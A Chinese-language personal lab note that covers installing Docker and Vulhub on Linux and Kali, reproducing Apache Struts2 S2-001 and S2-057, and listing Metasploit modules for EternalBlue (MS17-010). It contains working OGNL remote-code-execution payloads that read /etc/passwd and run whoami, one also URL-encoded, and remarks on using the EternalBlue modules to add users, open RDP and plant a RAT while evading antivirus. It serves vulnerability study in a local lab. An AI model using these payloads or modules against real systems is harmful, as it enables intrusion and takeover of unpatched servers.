2022-10-02笔记(linux&&kali安装docker&&vulhub、s2-001、s2-057、永恒之蓝常用模块)

1.linux安装dokcer

1. 因为Vulhub是一个基于docker和docker-compose的漏洞环境集合，所以，第一步我们需要安装docker
2. 首先更新一下软件:yum update
3. 安装https协议、CA证书:apt-get install -y apt-transport-https ca-certificates
4. 安装docker:apt install docker.io
5. 查看是否安装成功:docker -v
6. 启动docker:systemctl start docker
7. 查看docker信息:docker ps -a
8. 安装pip:apt-get install python3-pip
9. 安装docker-compose:pip3 install docker-compose
10. 查看docker-compose版本:docker-compose -v

2.kali安装docker

1. 进入sources.lis重新编辑apt源vim /etc/apt/sources.list

#安装哪个都可以，但是记得去掉#
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contribp.kali.org/kali kali-rolling main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib

2. 进行系统或工具的更新apt-get update && apt-get upgrade && apt-get dist-upgrade
   注：当出现正在设定软件包界面时，直接按tab+enter进行确认
3. 清除更新缓存apt-get clean
4. 安装dockerapt-get install docker docker-compose
5. 启动docker服务service docker start
6. 列出docker现有镜像docker images
7. 运行hello-world镜像，但apt安装的docker没带有hello-world默认镜像呀，所以下面的命令不成功，它会帮你拉去该镜像下来docker run hello-world
8. 配置镜像加速器vim /etc/docker/daemon.json

{
  "registry-mirrors": ["https://zto7rr04.mirror.aliyuncs.com"]
}

10. 重启dockersystemctl restart docker
11. 开机自启systemctl enable docker
12. docker使用

#笔者以拉取 CVE-2017-7504 的漏洞环境为例。
docker search testjboss #搜索漏洞环境
docker pull testjboss/jboss #拉取漏洞环境
docker run -d -p 80:8080 testjboss/jboss:latest
#-p 6379:6379 端口映射：前表示主机部分,后表示容器部分
#根据testjboss/jboss镜像创建并运行容器
ifconfig #查看已运行容器ip
#kali中，使用浏览器访问http://IP #IP可为127.0.0.1
docker ps #查看正在运行的容器
docker exec -it e8f4844aabc1 /bin/bash #进入容器(id:e8f4844aabc1)
exit #退出容器到宿主机（容器不会停止运行）
docker stop 3b41c0c08430 #关闭容器(id唯一标识，建议使用id)
docker --help #查看docker命令

3.linux安装vulhub

11. 下载安装vulhub:git clone https://github.com/vulhub/vulhub.git
12. 进入vulhub路径,查看里面的文件
13. 进入靶场
14. 开启靶场环境:docker-compose up -d
15. 测试连接:http://(linux的ip地址):端口/
16. 关闭环境:docker-compose down

4.s2-001复现

EXP
命令执行(命令加参数：new java.lang.String[]{“cat”,“/etc/passwd”})

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

5.s2-057复现

原理：

1. alwaysSelectFullNamespace被设置为true，此时namespace的值是从URL中获取的。URL是可控的，所以namespace也是可控的。
2. action元素没有名称空间属性集，或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式，最终导致远程代码执行的脆弱性。

url：

http://服务端ip:8080/struts2-showcase

PoC

例如目标地址为：http://127.0.0.1:8080/
1.
访问 http://127.0.0.1:8080/${(111+111)}/actionChain1.action

然后 URL 会变为 : http://127.0.0.1:8080/222/register2.action, 其中 222 部分为 ognl 表达式 ${(111+111)} 执行结果。
2.
whoami
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码
%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%77%68%6f%61%6d%69%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

访问 http://127.0.0.1:8080/编码/actionChain1.action

6.永恒之蓝（ms17-010）常用模块

1. 扫描模块

auxiliary/scanner/smb/smb_ms17_010

2. 攻击模块

auxiliary/amin/smb/ms17_010_command
该模块是所有利用方法中最为稳定的，并且不会被杀软拦截等。可以直接通过命令添加用户、开启3389、下载Rat等操作。
影响版本：windows server 2003、windows xp
–
exploit/windows/smb/ms17_010_psexec
需要命名管道开启
影响版本：windows server 2003、windows xp
–
exploit/windows/smb/ms17_010_eternalblue
影响版本：win7、win server 2008
存在ms17-010漏洞即可使用，不太稳定，容易被杀软识别，有概率导致目标机蓝屏
–
exploit/windows/smb/smb_doublepulsar_rce
双倍脉冲模块

3. 加固：
   禁用server服务
   win+r搜索services.msc

7.遇到的问题

ModuleNotFoundError: No module named ‘setuptools_rust‘

解决

pip3 install -U pip setuptools

安装docker-compose报【Read timed out】

解决

#（官网安装地址，较慢，可以执行下面国内地址）
sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
#1.国内加速安装
curl -L https://get.daocloud.io/docker/compose/releases/download/1.24.1/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
#2.Apply executable permissions to the binary
sudo chmod +x /usr/local/bin/docker-compose
#3.Test the installation.
docker-compose --version

运行docker-compose build报错

struts2 uses an image, skipping

解决

如果执行的命令为：
docker-compose build --force XXX

因为这个命令直接指向image，所以无法执行，需要重新指示对应的配置文件：
docker-compose -f .\docker-compose.yml -f .\docker-compose.dev.yml build XXX